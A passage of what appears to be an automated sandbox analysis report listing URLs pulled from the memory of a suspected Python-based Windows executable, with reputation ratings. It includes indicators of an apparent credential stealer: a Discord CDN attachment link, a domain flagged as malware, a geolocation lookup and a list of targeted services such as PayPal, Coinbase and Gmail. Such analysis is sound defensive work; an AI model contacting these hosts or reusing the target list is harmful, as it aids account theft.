                                  • Avira URL Cloud: safe
                                  low
                                  https://github.com/pypa/packagingKzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/pypa/setuptoolsKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://refspecs.linuxfoundation.org/elf/gabi4KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        https://pypi.org/project/setuptoolsKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/pypa/setuptools/workflows/tests/badge.svgKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.dhimyotis.com/certignarootca.crlPKzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://xbox.com)KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://blog.jaraco.com/skeletonKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://twitch.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://cdn.discordapp.com/attachments/963114349877162004/992593184251183195/7c8f476123d28d103efe381KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://tools.ietf.org/html/rfc3610KzqQe0QtRd.exe, 00000001.00000003.291291027.0000022127FBB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295871177.0000022127E93000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275288125.0000022127F91000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127E92000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291517549.0000022127FBE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280797584.0000022127F96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274505409.0000022127E8F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275572297.0000022127E92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://peps.python.org/pep-0205/KzqQe0QtRd.exe, 00000001.00000003.217980895.0000022126E29000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217610498.0000022126E29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.dhimyotis.com/certignarootca.crlKzqQe0QtRd.exe, 00000001.00000003.274781463.0000022128250000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275800863.0000022128230000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274722105.000002212823E000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275123747.0000022128251000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://ocsp.accv.esKzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274631255.0000022128191000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.mdKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://superfurrycdn.nl/copy/KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://docs.python.org/3/library/pprint.htmlKzqQe0QtRd.exe, 00000001.00000003.222418452.0000022127578000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294818950.0000022127391000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/pypa/setuptools/actions?query=workflow%3A%22tests%22KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296609743.0000022126738000.00000004.00001000.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://httpbin.org/getKzqQe0QtRd.exe, 00000001.00000003.282819422.0000022127E4C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292085021.0000022127372000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://gmail.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://paypal.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-accessKzqQe0QtRd.exe, 00000001.00000003.280107530.0000022126BD5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277774285.0000022126BC8000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295601281.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279389580.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288409865.0000022126BD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://uber.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                https://coinbase.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                https://wwww.certigna.fr/autorites/0mKzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerKzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/python/cpython/issues/86361.KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126DB1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217520428.0000022126ED1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218151664.0000022126ED1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218478065.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291819285.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.278923577.0000022126DDE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220317493.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297213465.0000022126DED000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220625598.0000022126DDA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218900511.0000022126DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://geolocation-db.com/jsonp/zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://httpbin.org/KzqQe0QtRd.exe, 00000001.00000003.291026470.0000022126D51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://wwww.certigna.fr/autorites/KzqQe0QtRd.exe, 00000001.00000003.294516751.00000221282E5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274712221.00000221282DB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275269484.0000022128148000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277019974.00000221282E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://codecov.io/gh/pypa/setuptoolsKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://roblox.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlKzqQe0QtRd.exe, 00000001.00000003.219642489.0000022127336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://hbo.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        http://crl.securetrust.com/STCA.crlmKzqQe0QtRd.exe, 00000001.00000003.295799416.00000221281BB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://binance.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        low
                                                                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.290631447.0000022127D07000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280811119.0000022126E07000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279135679.0000022126E04000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126E05000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127CF7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127CF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syKzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://twitter.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            low
                                                                            https://docs.python.org/3/library/multiprocessing.htmlKzqQe0QtRd.exe, 00000001.00000003.275835925.0000022126D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://docs.python.org/3/library/re.htmlKzqQe0QtRd.exe, 00000001.00000003.294548460.0000022127475000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287906992.0000022126E9C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E01000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276727923.000002212746B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E01000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286704566.000002212746C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275709684.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287484083.0000022126EAE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276603902.0000022126E8B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280811119.0000022126E07000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288482138.000002212746C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279135679.0000022126E04000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126E05000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280336661.0000022126E93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/pypa/setuptools/issues/417#issuecomment-392298401KzqQe0QtRd.exe, 00000001.00000002.297531973.0000022127030000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://github.com/ActiveState/appdirsKzqQe0QtRd.exe, 00000001.00000002.297603053.0000022127150000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://wiki.debian.org/XDGBaseDirectorySpecification#stateKzqQe0QtRd.exe, 00000001.00000003.287950087.0000022126B4A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277890620.0000022126B29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.securetrust.com/STCA.crlKzqQe0QtRd.exe, 00000001.00000003.295799416.00000221281BB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://wwwsearch.sf.net/):KzqQe0QtRd.exe, 00000001.00000003.275364164.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277253564.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274367842.0000022127DB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.xrampsecurity.com/XGCA.crl%KzqQe0QtRd.exe, 00000001.00000003.295799416.00000221281BB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://crl.xrampsecurity.com/XGCA.crlF2KzqQe0QtRd.exe, 00000001.00000003.275494844.0000022128143000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0KzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274631255.0000022128191000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.accv.es/legislacion_c.htmKzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://tiktok.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            low
                                                                                            http://crl.xrampsecurity.com/XGCA.crl0KzqQe0QtRd.exe, 00000001.00000003.291069837.0000022127538000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.298430849.0000022127538000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275690006.0000022127535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://bugs.python.org/issue44497.KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.discordapp.com/attachments/963114349877162004/992245751247806515/unknown.pngKzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://origin.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                https://telegram.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                https://riotgames.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                http://www.cert.fnmt.es/dpcs/KzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288518670.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277230606.0000022127C96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286608073.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279646443.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275885170.0000022127C84000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292764398.0000022127C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://playstation.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  low
                                                                                                  https://google.com/mailKzqQe0QtRd.exe, 00000001.00000003.287339683.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297223461.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292578153.0000022126DAD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/jaraco/jaraco.functools/issues/5KzqQe0QtRd.exe, 00000001.00000002.298591685.0000022127650000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://pornhub.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      low
                                                                                                      http://www.accv.es00KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyKzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmKzqQe0QtRd.exe, 00000001.00000003.219642489.0000022127336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdfKzqQe0QtRd.exe, 00000001.00000003.291291027.0000022127FBB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295871177.0000022127E93000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275288125.0000022127F91000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127E92000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291517549.0000022127FBE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280797584.0000022127F96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274505409.0000022127E8F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275572297.0000022127E92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
